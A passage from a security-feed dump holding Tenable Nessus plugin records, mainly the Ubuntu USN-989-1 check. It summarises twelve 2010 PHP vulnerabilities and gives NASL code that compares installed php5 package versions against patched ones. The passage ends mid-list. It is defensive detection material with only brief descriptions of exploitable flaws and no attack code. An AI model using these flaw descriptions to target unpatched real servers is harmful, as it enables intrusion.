reference:\"php-common-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-dba-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-devel-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-gd-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-imap-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-ldap-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-mbstring-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-mysql-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-ncurses-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-odbc-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-pdo-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-pgsql-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-snmp-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-soap-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-xml-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-xmlrpc-5.1.6-27.el5_5.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-bcmath / php-cli / php-common / php-dba / php-devel / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-02T15:32:33", "description": "Auke van Slooten discovered that PHP incorrectly handled certain xmlrpc requests. An attacker could exploit this issue to cause the PHP server to crash, resulting in a denial of service. This issue only affected Ubuntu 6.06 LTS, 8.04 LTS, 9.04 and 9.10. (CVE-2010-0397)\n\nIt was discovered that the pseudorandom number generator in PHP did not provide the expected entropy. An attacker could exploit this issue to predict values that were intended to be random, such as session cookies. This issue only affected Ubuntu 6.06 LTS, 8.04 LTS, 9.04 and 9.10. (CVE-2010-1128)\n\nIt was discovered that PHP did not properly handle directory pathnames that lacked a trailing slash character. An attacker could exploit this issue to bypass safe_mode restrictions. This issue only affected Ubuntu 6.06 LTS, 8.04 LTS, 9.04 and 9.10. (CVE-2010-1129)\n\nGrzegorz Stachowiak discovered that the PHP session extension did not properly handle semicolon characters. An attacker could exploit this issue to bypass safe_mode restrictions. This issue only affected Ubuntu 8.04 LTS, 9.04 and 9.10. (CVE-2010-1130)\n\nStefan Esser discovered that PHP incorrectly decoded remote HTTP chunked encoding streams. An attacker could exploit this issue to cause the PHP server to crash and possibly execute arbitrary code with application privileges. This issue only affected Ubuntu 10.04 LTS.\n(CVE-2010-1866)\n\nMateusz Kocielski discovered that certain PHP SQLite functions incorrectly handled empty SQL queries. An attacker could exploit this issue to possibly execute arbitrary code with application privileges.\n(CVE-2010-1868)\n\nMateusz Kocielski discovered that PHP incorrectly handled certain arguments to the fnmatch function. An attacker could exploit this flaw and cause the PHP server to consume all available stack memory, resulting in a denial of service. (CVE-2010-1917)\n\nStefan Esser discovered that PHP incorrectly handled certain strings in the phar extension. An attacker could exploit this flaw to possibly view sensitive information. This issue only affected Ubuntu 10.04 LTS.\n(CVE-2010-2094, CVE-2010-2950)\n\nStefan Esser discovered that PHP incorrectly handled deserialization of SPLObjectStorage objects. A remote attacker could exploit this issue to view sensitive information and possibly execute arbitrary code with application privileges. This issue only affected Ubuntu 8.04 LTS, 9.04, 9.10 and 10.04 LTS. (CVE-2010-2225)\n\nIt was discovered that PHP incorrectly filtered error messages when limits for memory, execution time, or recursion were exceeded. A remote attacker could exploit this issue to possibly view sensitive information. (CVE-2010-2531)\n\nStefan Esser discovered that the PHP session serializer incorrectly handled the PS_UNDEF_MARKER marker. An attacker could exploit this issue to alter arbitrary session variables. (CVE-2010-3065).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2010-09-21T00:00:00", "type": "nessus", "title": "Ubuntu 6.06 LTS / 8.04 LTS / 9.04 / 9.10 / 10.04 LTS : php5 vulnerabilities (USN-989-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-0397", "CVE-2010-1128", "CVE-2010-1129", "CVE-2010-1130", "CVE-2010-1866", "CVE-2010-1868", "CVE-2010-1917", "CVE-2010-2094", "CVE-2010-2225", "CVE-2010-2531", "CVE-2010-2950", "CVE-2010-3065"], "modified": "2019-09-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php5", "p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php5filter", "p-cpe:/a:canonical:ubuntu_linux:php-pear", "p-cpe:/a:canonical:ubuntu_linux:php5", "p-cpe:/a:canonical:ubuntu_linux:php5-cgi", "p-cpe:/a:canonical:ubuntu_linux:php5-cli", "p-cpe:/a:canonical:ubuntu_linux:php5-common", "p-cpe:/a:canonical:ubuntu_linux:php5-curl", "p-cpe:/a:canonical:ubuntu_linux:php5-dbg", "p-cpe:/a:canonical:ubuntu_linux:php5-dev", "p-cpe:/a:canonical:ubuntu_linux:php5-enchant", "p-cpe:/a:canonical:ubuntu_linux:php5-gd", "p-cpe:/a:canonical:ubuntu_linux:php5-gmp", "p-cpe:/a:canonical:ubuntu_linux:php5-intl", "p-cpe:/a:canonical:ubuntu_linux:php5-ldap", "p-cpe:/a:canonical:ubuntu_linux:php5-mhash", "p-cpe:/a:canonical:ubuntu_linux:php5-mysql", "p-cpe:/a:canonical:ubuntu_linux:php5-mysqli", "p-cpe:/a:canonical:ubuntu_linux:php5-odbc", "p-cpe:/a:canonical:ubuntu_linux:php5-pgsql", "p-cpe:/a:canonical:ubuntu_linux:php5-pspell", "p-cpe:/a:canonical:ubuntu_linux:php5-recode", "p-cpe:/a:canonical:ubuntu_linux:php5-snmp", "p-cpe:/a:canonical:ubuntu_linux:php5-sqlite", "p-cpe:/a:canonical:ubuntu_linux:php5-sybase", "p-cpe:/a:canonical:ubuntu_linux:php5-tidy", "p-cpe:/a:canonical:ubuntu_linux:php5-xmlrpc", "p-cpe:/a:canonical:ubuntu_linux:php5-xsl", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "cpe:/o:canonical:ubuntu_linux:6.06:-:lts", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts", "cpe:/o:canonical:ubuntu_linux:9.04", "cpe:/o:canonical:ubuntu_linux:9.10"], "id": "UBUNTU_USN-989-1.NASL", "href": "https://www.tenable.com/plugins/nessus/49306", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-989-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(49306);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/09/19 12:54:26\");\n\n script_cve_id(\"CVE-2010-0397\", \"CVE-2010-1128\", \"CVE-2010-1129\", \"CVE-2010-1130\", \"CVE-2010-1866\", \"CVE-2010-1868\", \"CVE-2010-1917\", \"CVE-2010-2094\", \"CVE-2010-2225\", \"CVE-2010-2531\", \"CVE-2010-2950\", \"CVE-2010-3065\");\n script_bugtraq_id(38182, 38430, 38431, 38708, 39877, 40013, 40173, 40948, 41991);\n script_xref(name:\"USN\", value:\"989-1\");\n\n script_name(english:\"Ubuntu 6.06 LTS / 8.04 LTS / 9.04 / 9.10 / 10.04 LTS : php5 vulnerabilities (USN-989-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Auke van Slooten discovered that PHP incorrectly handled certain\nxmlrpc requests. An attacker could exploit this issue to cause the PHP\nserver to crash, resulting in a denial of service. This issue only\naffected Ubuntu 6.06 LTS, 8.04 LTS, 9.04 and 9.10. (CVE-2010-0397)\n\nIt was discovered that the pseudorandom number generator in PHP did\nnot provide the expected entropy. An attacker could exploit this issue\nto predict values that were intended to be random, such as session\ncookies. This issue only affected Ubuntu 6.06 LTS, 8.04 LTS, 9.04 and\n9.10. (CVE-2010-1128)\n\nIt was discovered that PHP did not properly handle directory pathnames\nthat lacked a trailing slash character. An attacker could exploit this\nissue to bypass safe_mode restrictions. This issue only affected\nUbuntu 6.06 LTS, 8.04 LTS, 9.04 and 9.10. (CVE-2010-1129)\n\nGrzegorz Stachowiak discovered that the PHP session extension did not\nproperly handle semicolon characters. An attacker could exploit this\nissue to bypass safe_mode restrictions. This issue only affected\nUbuntu 8.04 LTS, 9.04 and 9.10. (CVE-2010-1130)\n\nStefan Esser discovered that PHP incorrectly decoded remote HTTP\nchunked encoding streams. An attacker could exploit this issue to\ncause the PHP server to crash and possibly execute arbitrary code with\napplication privileges. This issue only affected Ubuntu 10.04 LTS.\n(CVE-2010-1866)\n\nMateusz Kocielski discovered that certain PHP SQLite functions\nincorrectly handled empty SQL queries. An attacker could exploit this\nissue to possibly execute arbitrary code with application privileges.\n(CVE-2010-1868)\n\nMateusz Kocielski discovered that PHP incorrectly handled certain\narguments to the fnmatch function. An attacker could exploit this flaw\nand cause the PHP server to consume all available stack memory,\nresulting in a denial of service. (CVE-2010-1917)\n\nStefan Esser discovered that PHP incorrectly handled certain strings\nin the phar extension. An attacker could exploit this flaw to possibly\nview sensitive information. This issue only affected Ubuntu 10.04 LTS.\n(CVE-2010-2094, CVE-2010-2950)\n\nStefan Esser discovered that PHP incorrectly handled deserialization\nof SPLObjectStorage objects. A remote attacker could exploit this\nissue to view sensitive information and possibly execute arbitrary\ncode with application privileges. This issue only affected Ubuntu 8.04\nLTS, 9.04, 9.10 and 10.04 LTS. (CVE-2010-2225)\n\nIt was discovered that PHP incorrectly filtered error messages when\nlimits for memory, execution time, or recursion were exceeded. A\nremote attacker could exploit this issue to possibly view sensitive\ninformation. (CVE-2010-2531)\n\nStefan Esser discovered that the PHP session serializer incorrectly\nhandled the PS_UNDEF_MARKER marker. An attacker could exploit this\nissue to alter arbitrary session variables. (CVE-2010-3065).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/989-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php5filter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-mhash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-mysqli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-sybase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/03/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/09/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/09/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2010-2019 Canonical, Inc. / NASL script (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(6\\.06|8\\.04|9\\.04|9\\.10|10\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 6.06 / 8.04 / 9.04 / 9.10 / 10.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libapache2-mod-php5\", pkgver:\"5.1.2-1ubuntu3.19\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php-pear\", pkgver:\"5.1.2-1ubuntu3.19\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5\", pkgver:\"5.1.2-1ubuntu3.19\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-cgi\", pkgver:\"5.1.2-1ubuntu3.19\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-cli\", pkgver:\"5.1.2-1ubuntu3.19\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-common\", pkgver:\"5.1.2-1ubuntu3.19\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-curl\", pkgver:\"5.1.2-1ubuntu3.19\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-dev\", pkgver:\"5.1.2-1ubuntu3.19\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-gd\", pkgver:\"5.1.2-1ubuntu3.19\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-ldap\", pkgver:\"5.1.2-1ubuntu3.19\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-mhash\", pkgver:\"5.1.2-1ubuntu3.19\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-mysql\", pkgver:\"5.1.2-1ubuntu3.19\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-mysqli\", pkgver:\"5.1.2-1ubuntu3.19\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-odbc\", pkgver:\"5.1.2-1ubuntu3.19\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-pgsql\", pkgver:\"5.1.2-1ubuntu3.19\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-recode\", pkgver:\"5.1.2-1ubuntu3.19\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-snmp\", pkgver:\"5.1.2-1ubuntu3.19\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-sqlite\", pkgver:\"5.1.2-1ubuntu3.19\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-sybase\", pkgver:\"5.1.2-1ubuntu3.19\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-xmlrpc\", pkgver:\"5.1.2-1ubuntu3.19\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-xsl\", pkgver:\"5.1.2-1ubuntu3.19\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libapache2-mod-php5\", pkgver:\"5.2.4-2ubuntu5.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php-pear\", pkgver:\"5.2.4-2ubuntu5.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5\", pkgver:\"5.2.4-2ubuntu5.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-cgi\", pkgver:\"5.2.4-2ubuntu5.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-cli\", pkgver:\"5.2.4-2ubuntu5.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-common\", pkgver:\"5.2.4-2ubuntu5.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-curl\", pkgver:\"5.2.4-2ubuntu5.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-dev\", pkgver:\"5.2.4-2ubuntu5.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-gd\", pkgver:\"5.2.4-2ubuntu5.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-gmp\", pkgver:\"5.2.4-2ubuntu5.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-ldap\", pkgver:\"5.2.4-2ubuntu5.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-mhash\", pkgver:\"5.2.4-2ubuntu5.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-mysql\", pkgver:\"5.2.4-2ubuntu5.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-odbc\", pkgver:\"5.2.4-2ubuntu5.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-pgsql\", pkgver:\"5.2.4-2ubuntu5.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-pspell\", pkgver:\"5.2.4-2ubuntu5.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-recode\", pkgver:\"5.2.4-2ubuntu5.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-snmp\", pkgver:\"5.2.4-2ubuntu5.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-sqlite\", pkgver:\"5.2.4-2ubuntu5.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-sybase\", pkgver:\"5.2.4-2ubuntu5.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-tidy\", pkgver:\"5.2.4-2ubuntu5.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-xmlrpc\", pkgver:\"5.2.4-2ubuntu5.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-xsl\", pkgver:\"5.2.4-2ubuntu5.12\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libapache2-mod-php5\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libapache2-mod-php5filter\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php-pear\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-cgi\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-cli\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-common\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-curl\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-dbg\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-dev\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-gd\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-gmp\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-ldap\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-mhash\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-mysql\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-odbc\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-pgsql\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-pspell\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-recode\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-snmp\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-sqlite\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-sybase\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-tidy\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-xmlrpc\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-xsl\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libapache2-mod-php5\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libapache2-mod-php5filter\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php-pear\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-cgi\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-cli\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-common\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-curl\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-dbg\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-dev\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-gd\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-gmp\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-ldap\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-mhash\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-mysql\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-odbc\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-pgsql\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-pspell\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-recode\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-snmp\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-sqlite\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-sybase\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-tidy\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-xmlrpc\", 